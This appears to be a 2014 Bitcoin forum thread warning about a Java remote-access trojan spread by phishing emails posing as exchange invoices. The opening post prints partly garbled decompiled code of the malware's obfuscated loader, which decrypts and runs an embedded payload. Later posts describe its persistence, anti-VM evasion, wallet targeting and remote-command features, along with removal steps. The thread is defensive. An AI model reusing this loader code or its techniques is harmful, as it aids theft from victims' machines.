Bitcoin Forum

Bitcoin => Bitcoin Discussion => Topic started by: Aditya on June 14, 2014, 03:44:15 PM

Title: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on June 14, 2014, 03:44:15 PM
At first I received a SPAM E-mail that looks like from ItBit Support. I opened an account on ItBit some days ago. I thought it was legit, maybe some private key backup. I downloaded and run the attachment (I ignore the warning and mark the JAR file as executable). Nothing happened, I started to suspect it was a malware.

Everytime I logged in to my Desktop. A Java process started. I check it using command line (Guess what? I use GNU/Linux and even GNU/Linux are vulnerable!):

The malware started automatically as local process everytime that user logged in.

Yeah, Found that malware hidden folder.

That's the java executable files. If you extract the folder you got three folder and here is the content:

• ID
• JarMain.class



• UnrecomServer.class

Seems that the Main Class are JarMain.class I try to decompile it and here is the source code:

package load;

import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashMap;
import java.util.jar.JarEntry;
import java.util.jar.JarInputStream;

public class JarMain
extends ClassLoader
private HashMap a = new HashMap();
private HashMap b = new HashMap();
public static boolean c;
public static boolean d;
private static final String[] z;

public InputStream getResourceAsStream(String paramString)
byte[] arrayOfByte = (byte[])this.b.get(paramString.replace("/", ".").replace(JarMain.z[6], ""));
if (arrayOfByte != null)
ByteArrayInputStream localByteArrayInputStream = new ByteArrayInputStream(arrayOfByte);
return localByteArrayInputStream;
return null;

public JarMain()

private String a(InputStream paramInputStream)
InputStreamReader localInputStreamReader = new InputStreamReader(paramInputStream);
BufferedReader localBufferedReader = new BufferedReader(localInputStreamReader);
String str = localBufferedReader.readLine();
return str;

private JarInputStream a(byte[] paramArrayOfByte, String paramString)
return new JarInputStream(new ByteArrayInputStream(b(paramArrayOfByte, paramString)));

private InputStream a()
return getClass().getResourceAsStream(new StringBuilder(JarMain.z[4]).reverse().toString());

public synchronized void b()
boolean bool = JarMain.d;
InputStream localInputStream = getClass().getResourceAsStream(new StringBuilder(JarMain.z[3]).reverse().toString());
String str1 = a(localInputStream);
StringBuilder localStringBuilder1 = new StringBuilder();
StringBuilder localStringBuilder2 = new StringBuilder();
StringBuilder localStringBuilder3 = new StringBuilder();
StringBuilder localStringBuilder4 = new StringBuilder();
StringBuilder localStringBuilder5 = new StringBuilder();
StringBuilder localStringBuilder6 = new StringBuilder();
StringBuilder localStringBuilder7 = new StringBuilder();
StringBuilder localStringBuilder8 = new StringBuilder();
localInputStream = a();
StringBuilder localStringBuilder9 = new StringBuilder();
StringBuilder localStringBuilder10 = new StringBuilder();
StringBuilder localStringBuilder11 = new StringBuilder();
StringBuilder localStringBuilder12 = new StringBuilder();
StringBuilder localStringBuilder13 = new StringBuilder();
StringBuilder localStringBuilder14 = new StringBuilder();
StringBuilder localStringBuilder15 = new StringBuilder();
byte[] arrayOfByte = new byte['Ѐ'];
ByteArrayOutputStream localByteArrayOutputStream1 = new ByteArrayOutputStream();
int i;
while ((i = > -1)
localByteArrayOutputStream1.write(arrayOfByte, 0, i);
if (bool) {
break label248;
if (bool) {
JarMain.c = !JarMain.c;
JarInputStream localJarInputStream = a(localByteArrayOutputStream1.toByteArray(), str1);
JarEntry localJarEntry1 = b(localJarInputStream);
while ((localJarEntry1 = localJarInputStream.getNextJarEntry()) != null) {
if (!localJarEntry1.isDirectory())
JarEntry localJarEntry2 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry3 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry4 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry5 = new JarEntry(JarMain.z[2]);
String str2 = a(localJarEntry1);
JarEntry localJarEntry6 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry7 = new JarEntry(JarMain.z[2]);
ByteArrayOutputStream localByteArrayOutputStream2 = new ByteArrayOutputStream();
if ((i = <= -1) {
localByteArrayInputStream = new ByteArrayInputStream(new byte[] { 1 });
localByteArrayOutputStream2.write(arrayOfByte, 0, i);
if (bool) {
break label463;
} while (!bool);
ByteArrayInputStream localByteArrayInputStream = new ByteArrayInputStream(new byte[] { 1 });
this.b.put(str2, localByteArrayOutputStream2.toByteArray());
} while (bool);

private void a(JarInputStream paramJarInputStream)

private String a(JarEntry paramJarEntry)
JarEntry localJarEntry1 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry2 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry3 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry4 = new JarEntry(JarMain.z[2]);
String str = paramJarEntry.getName();
JarEntry localJarEntry5 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry6 = new JarEntry(JarMain.z[2]);
str = str.replace("/", ".");
JarEntry localJarEntry7 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry8 = new JarEntry(JarMain.z[2]);
str = str.replace(JarMain.z[6], "");
JarEntry localJarEntry9 = new JarEntry(JarMain.z[2]);
JarEntry localJarEntry10 = new JarEntry(JarMain.z[2]);
return str;

private JarEntry b(JarInputStream paramJarInputStream)
return paramJarInputStream.getNextJarEntry();

public Class loadClass(String paramString)
return findClass(paramString);

/* Error */
public Class findClass(String paramString)
// Byte code:
// 0: aload_0
// 1: getfield 16 load/JarMain:a Ljava/util/HashMap;
// 4: aload_1
// 5: invokevirtual 7 java/util/HashMap:get (Ljava/lang/Object;)Ljava/lang/Object;
// 8: checkcast 59 java/lang/Class
// 11: astore_2
// 12: aload_2
// 13: getstatic 252 load/JarMain:d Z
// 16: ifne +23 -> 39
// 19: ifnull +15 -> 34
// 22: goto +4 -> 26
// 25: athrow
// 26: aload_0
// 27: aload_2
// 28: invokevirtual 60 load/JarMain:resolveClass (Ljava/lang/Class;)V
// 31: aload_2
// 32: areturn
// 33: athrow
// 34: aload_0
// 35: aload_1
// 36: invokevirtual 61 load/JarMain:findSystemClass (Ljava/lang/String;)Ljava/lang/Class;
// 39: areturn
// 40: astore_3
// 41: new 27 java/lang/StringBuilder
// 44: dup
// 45: invokespecial 35 java/lang/StringBuilder: ()V
// 48: astore_3
// 49: new 27 java/lang/StringBuilder
// 52: dup
// 53: invokespecial 35 java/lang/StringBuilder: ()V
// 56: astore 4
// 58: new 27 java/lang/StringBuilder
// 61: dup
// 62: invokespecial 35 java/lang/StringBuilder: ()V
// 65: astore 5
// 67: new 27 java/lang/StringBuilder
// 70: dup
// 71: invokespecial 35 java/lang/StringBuilder: ()V
// 74: astore 6
// 76: new 27 java/lang/StringBuilder
// 79: dup
// 80: invokespecial 35 java/lang/StringBuilder: ()V
// 83: astore 7
// 85: new 27 java/lang/StringBuilder
// 88: dup
// 89: invokespecial 35 java/lang/StringBuilder: ()V
// 92: astore 8
// 94: new 27 java/lang/StringBuilder
// 97: dup
// 98: invokespecial 35 java/lang/StringBuilder: ()V
// 101: astore 9
// 103: new 27 java/lang/StringBuilder
// 106: dup
// 107: invokespecial 35 java/lang/StringBuilder: ()V
// 110: astore 10
// 112: new 27 java/lang/StringBuilder
// 115: dup
// 116: invokespecial 35 java/lang/StringBuilder: ()V
// 119: astore 11
// 121: new 27 java/lang/StringBuilder
// 124: dup
// 125: invokespecial 35 java/lang/StringBuilder: ()V
// 128: astore 12
// 130: new 27 java/lang/StringBuilder
// 133: dup
// 134: invokespecial 35 java/lang/StringBuilder: ()V
// 137: astore 13
// 139: aload_0
// 140: getfield 1 load/JarMain:b Ljava/util/HashMap;
// 143: aload_1
// 144: invokevirtual 7 java/util/HashMap:get (Ljava/lang/Object;)Ljava/lang/Object;
// 147: checkcast 8 [B
// 150: astore 14
// 152: aload_0
// 153: aload_1
// 154: aload 14
// 156: invokespecial 63 load/JarMain:a (Ljava/lang/String;[B)Ljava/lang/Class;
// 159: astore_2
// 160: aload_0
// 161: getfield 16 load/JarMain:a Ljava/util/HashMap;
// 164: aload_1
// 165: aload_2
// 166: invokevirtual 52 java/util/HashMap:put (Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
// 169: pop
// 170: aload_2
// 171: areturn
// Local variable table:
// start length slot name signature
// 0 172 0 this JarMain
// 0 172 1 paramString String
// 11 160 2 localClass Class
// 40 1 3 localClassNotFoundException1 java.lang.ClassNotFoundException
// 48 1 3 localStringBuilder1 StringBuilder
// 56 1 4 localStringBuilder2 StringBuilder
// 65 1 5 localStringBuilder3 StringBuilder
// 74 1 6 localStringBuilder4 StringBuilder
// 83 1 7 localStringBuilder5 StringBuilder
// 92 1 8 localStringBuilder6 StringBuilder
// 101 1 9 localStringBuilder7 StringBuilder
// 110 1 10 localStringBuilder8 StringBuilder
// 119 1 11 localStringBuilder9 StringBuilder
// 128 1 12 localStringBuilder10 StringBuilder
// 137 1 13 localStringBuilder11 StringBuilder
// 150 5 14 arrayOfByte byte[]
// 25 1 16 localClassNotFoundException2 java.lang.ClassNotFoundException
// 33 1 17 localClassNotFoundException3 java.lang.ClassNotFoundException
// Exception table:
// from to target type
// 12 22 25 java/lang/ClassNotFoundException
// 19 33 33 java/lang/ClassNotFoundException
// 34 39 40 java/lang/ClassNotFoundException

private Class a(String paramString, byte[] paramArrayOfByte)
return defineClass(paramString, paramArrayOfByte, 0, paramArrayOfByte.length);

private byte[] b(byte[] paramArrayOfByte, String paramString)
boolean bool = JarMain.d;
String str = paramString + JarMain.z[5];
byte[] arrayOfByte = paramArrayOfByte;
int[] arrayOfInt1 = new int['ā'];
int[] arrayOfInt2 = new int['ā'];
int i = 0;
int j = 0;
int i1 = 0;
int k = 0;
int m = 0;
int n = 0;
i = 0;
if (i >= 256) {
arrayOfInt1[i] = i;
if (bool) {
break label97;
} while (!bool);
j = 0;
i = 0;
if (i >= 256) {
if (!bool)
if (bool) {
break label163;
if (j != str.length()) {}
j = 0;
arrayOfInt2[i] = str.charAt(j++);
} while (!bool);
j = 0;
i = 0;
if (i >= 256) {
j = (j + arrayOfInt1[i] + arrayOfInt2[i]) % 256;
n = (char)arrayOfInt1[i];
arrayOfInt1[i] = arrayOfInt1[j];
arrayOfInt1[j] = n;
if (bool) {
break label230;
} while (!bool);
i = j = 0;
m = 0;
if (m >= arrayOfByte.length) {
i = (i + 1) % 256;
j = (j + arrayOfInt1[i]) % 256;
n = (char)arrayOfInt1[i];
arrayOfInt1[i] = arrayOfInt1[j];
arrayOfInt1[j] = n;
k = (arrayOfInt1[i] + arrayOfInt1[j]) % 256;
i1 = (char)arrayOfInt1[k];
if (bool) {
break label344;
arrayOfByte[m] = ((byte)(arrayOfByte[m] ^ i1));
} while (!bool);
return arrayOfByte;

public static void main(String[] paramArrayOfString)
boolean bool = JarMain.d;
JarMain localJarMain = new JarMain();
Class localClass = localJarMain.loadClass(JarMain.z[1]);
Method localMethod = localClass.getMethod(JarMain.z[0], new Class[] { [Ljava.lang.String.class });
int i = localMethod.getModifiers();
if ((bool) || ((Modifier.isPublic(i)) && (Modifier.isStatic(i)))) {
localMethod.invoke(null, new Object[] { new String[0] });
if (JarMain.c) {
JarMain.d = !bool;

break label76;
0["l\0058\\"] = -1;
break label76;
1["H\n8Q{n"] = 0;
break label76;
2["b\013<\034x`\0220\034at\n"] = 1;
break label76;
3["E-"] = 2;
break label76;
4["G)fAD\"\030|SLK5S}mK"] = 3;
String[] tmp51_2 = new String[7];
break label76;
5["E!\002e%N3\032wXS1eb J"] = 4;
break label76;
6["/\007=Sar"] = 5;
JarMain.z = tmp51_2;
tmp80_77 = tmp51_2.toCharArray();
int i = 0;
if (tmp80_77.length <= 1) {}
char[] tmp91_80 = tmp80_77;
int tmp93_92 = i;;
switch (i % 5)
case 0:
tmpTernaryOp = 1;
case 1:
tmpTernaryOp = 100;
case 2:
tmpTernaryOp = 81;
case 3:
tmpTernaryOp = 50;
tmp93_91[tmp93_92] = ((char)(tmp93_91[tmp93_92] ^ 0x12));
} while (tmp166_152 > i);
new String(tmp160_152);
switch (tmp160_91)

Java Source code for UnrecomServer.class

package plugins;

import java.util.Properties;

public abstract class UnrecomServer
public Socket socket;
public ObjectOutputStream out;
public ObjectInputStream in;
private static final long serialVersionUID = 1086053664594604059L;
public static Properties config;

public abstract void offLine();

public abstract String getId();

public abstract void onLine();

Thanks God, I don't lost any bitcoin. I don't know what kind of malware it is, maybe some KeyLogger?

I am warning you guys not to open or run suspicious file. Even if you are running Mac OS X or GNU/Linux. Many malware today are designed to run on multi platform using Java or Python like this malware.

Last but not least, here is the Malware File: Itbit-information-wallet.jar ( (Don't Run it on any system you care)

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: joshraban76 on June 14, 2014, 03:54:38 PM
Thank you for pointing out, it could be key-logger, most probably.

Kindly, use sandbox before playing with any suspicious file.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: allcrypt on June 14, 2014, 08:04:27 PM
Wait - let me get this straight - you got an email with an executable attachment - and you ran it?


*walks away from computer*

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: ujka on June 14, 2014, 08:29:14 PM
Wait - let me get this straight - you got an email with an executable attachment - and you ran it?


*walks away from computer*
No. He got an email with attachment. He saved the attachment and changed the saved .jar file permissions to 'executable'. Then he ran the file.
What more to say...

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on June 15, 2014, 12:21:20 PM
On Windows XP it Run on Single double-click without any warning.

It install itself on C:\Document and Settings\<username>\Application Data\FolrderName with supper hidden attribute. And Automatically run on startup using System Configuration Utility (msconfig).

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on June 15, 2014, 12:37:46 PM
I am n00b in programming. Could anyone who understand Java tell me what the malware does?

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: rcocchiararo on June 15, 2014, 01:15:46 PM
I have been away since my last (failed traiding > left bitcoins untouched till they were worth millions > decided they were safe in mtgox > lost em all)

Leaving that behind, i just got an email from "" saying:

Dear User

Successful authorization.

0.758484 BTC Has been Send To another account

To show invoice , Download From Attach


Administration of

Attached it has a file named "invoice_btc487744.jar

Since i no longer mine, and i have not been on that pool for ages, i knew i had no btc there.

Then again, a .jar CANOT bean invoice :P

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on June 15, 2014, 02:28:16 PM
I have been away since my last (failed traiding > left bitcoins untouched till they were worth millions > decided they were safe in mtgox > lost em all)

Leaving that behind, i just got an email from "" saying:

Dear User

Successful authorization.

0.758484 BTC Has been Send To another account

To show invoice , Download From Attach


Administration of

Attached it has a file named "invoice_btc487744.jar

Since i no longer mine, and i have not been on that pool for ages, i knew i had no btc there.

Then again, a .jar CANOT bean invoice :P

May I have the JAR file? Probably the same malware as I have.

I also found a hidden folder RsPJzZlzez that contains three binary file. I open it using Hex Editor and found strings like wallet.dat, multibit.wallet. Even DogeCoin and many other alt coin are targeted.

How to steal from web wallet? Phishing site

How to steal from desktop wallet? Trojan horse

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on June 16, 2014, 03:12:20 AM
Tried on Windows 8.1

On Windows 8.1 The JAR file Run on single double-click without any warnings. No need to mark it as executable first. Anti Virus also doesn't show any warnings. I use Panda Internet Security 2014, latest update and no warning at all.

The malware installed itself on this Directory

Using Super Hidden Attribute, you can't see the file. Even you will not find FolrderName folder if you don't reveal it using attrib -s -h /s /d command. Turning on show hidden items doesn't reveal the malware.

The malware start itself up when infected user log in. You can view it on Task Manager under Start-up Tab, there is Java there.

Also the malware create a directory in C:\Users\<username>\.RsPJzZlzez

To manually remove, disable the start-up process and Delete that hidden folder (you have to use attrib -s -h /s /d command to reveal it)

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: victzhang on July 03, 2014, 06:29:41 AM
I got an email titled "OKCoin Invoice" today with the same malware attached. It seems the malware is being widely spread.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: victzhang on July 03, 2014, 06:40:53 AM
Java disassembler doesn't help much, because this malware is obfuscated by Allatori (a java obfuscator).
Some interesting discussions are going on here:

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: pimytron on July 07, 2014, 11:45:35 AM
can i open it in a VM to see what happens????????

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: OnkelPaul on July 07, 2014, 11:54:42 AM
can i open it in a VM to see what happens????????

If you need to ask...


Really, when analysing malware, if you don't know exactly what you're doing and that you're doing it safely, don't do it at all!

Onkel Paul

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: pimytron on July 07, 2014, 12:05:47 PM
can i open it in a VM to see what happens????????

If you need to ask...


Really, when analysing malware, if you don't know exactly what you're doing and that you're doing it safely, don't do it at all!

Onkel Paul

I did not want to ask.
I wanted to run in a VM under ubuntu on a newly formatted laptop without personal data. I wanted to analyze it, do some network captures and putting infected files on my VM. But I read "this RAT actually checks if virtualbox is installed and running, and exits if it is. So it tries to evade analysis That Way." and do not understand what this means.
As I can analyze it?
Any tool?

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: xcapator on July 07, 2014, 12:35:30 PM
more information can be found here

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: Aditya on July 12, 2014, 01:48:56 PM
I did not want to ask.
I wanted to run in a VM under ubuntu on a newly formatted laptop without personal data. I wanted to analyze it, do some network captures and putting infected files on my VM. But I read "this RAT actually checks if virtualbox is installed and running, and exits if it is. So it tries to evade analysis That Way." and do not understand what this means.
As I can analyze it?
Any tool?

You need to install Java Runtime Enviroment on your Virtual Machine. This RAT will not work without Java Runtime Enviroment.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: commandrix on July 12, 2014, 02:16:43 PM
I've gotten emails like this too, only it hasn't been anything to do with Bitcoin (so far). I'm sorry you had to learn this lesson the hard way. This is why I don't like downloading anything that has a .tar.gz, .RAR or .EXE extension unless it's from the official website and I know exactly what it's supposed to do. If you just get an email from somebody claiming to be a service you use out of the blue, open another tab on your browser and go DIRECTLY to the official website so you can see what's really going on.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: LiteCoinGuy on July 12, 2014, 02:18:14 PM
"I downloaded and run the attachment ...."

there i stopped reading.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: on July 12, 2014, 02:19:27 PM
It's unrecom aka adwind rat.

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: BillyBobJoe on July 12, 2014, 02:32:40 PM
Wait - let me get this straight - you got an email with an executable attachment - and you ran it?


*walks away from computer*

Then goes on to say "I use GNU/Linux and even GNU/Linux are vulnerable!"

Title: Re: Beware! MultiPlatform Malware Try To Steal Your Wallet
Post by: hhanh00 on July 12, 2014, 04:14:15 PM
Someone decompiled the jar at (

It's a trojan that turns your machine into a bot.
From what I see from the source code...

It connects to a remote server, logins with the credentials that are in its config.xml
Then it waits for orders.
There are several commands. You can see in the options folder.
- pop up some message window
- execute arbitrary system commands,
- execute code that it sends to you,
- upload a plugin, i.e. new code to enhance its functionality
- browse to a url
- upload a screenshot

Yeah ... it's pretty bad.
